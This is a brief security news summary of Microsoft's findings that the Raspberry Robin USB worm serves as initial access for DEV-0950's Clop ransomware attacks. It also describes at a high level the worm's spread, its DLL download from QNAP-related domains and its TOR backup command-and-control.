"Raspberry Robin Operators Are Selling Initial Access to Compromised Enterprise Networks to Ransomware Gangs"
Microsoft has discovered evidence linking the Raspberry Robin worm to human-operated ransomware attacks. According to data gathered by Microsoft Defender for Endpoint, nearly 3,000 devices in about 1,000 organizations have received at least one Raspberry Robin payload-related alert in the last 30 days. The experts discovered that threat actors identified as DEV-0950 used Clop ransomware to encrypt the networks of organizations previously infected with the worm. The malware was used in post-compromise activity attributed to another actor, DEV-0950, which overlaps with the FIN11/TA505 cybercrime gang. The Cobalt Strike beacon was deployed as a result of the DEV-0950 attacks. In some cases, the Truebot malware was delivered between the Raspberry Robin infection and the Cobalt Strike deployment. DEV-0950 has traditionally acquired most of its victims through phishing, so this shift to using Raspberry Robin allows them to deliver payloads to existing infections and move their campaigns more quickly to ransomware stages. Given the interconnected nature of the cybercriminal economy, the actors behind these Raspberry Robin-related malware campaigns may be paying the Raspberry Robin operators for malware installs. Raspberry Robin is a Windows worm discovered by Red Canary cybersecurity researchers in September 2021. It spreads via removable USB devices. The malicious code makes use of Windows Installer to connect to QNAP-related domains and download a malicious DLL. As a backup command-and-control (C2) infrastructure, the malware employs TOR exit nodes. Experts have observed Raspberry Robin targeting organizations in the technology and manufacturing industries. This article continues to discuss the DEV-0950 group using Clop ransomware to encrypt the network of organizations previously infected with the Raspberry Robin worm.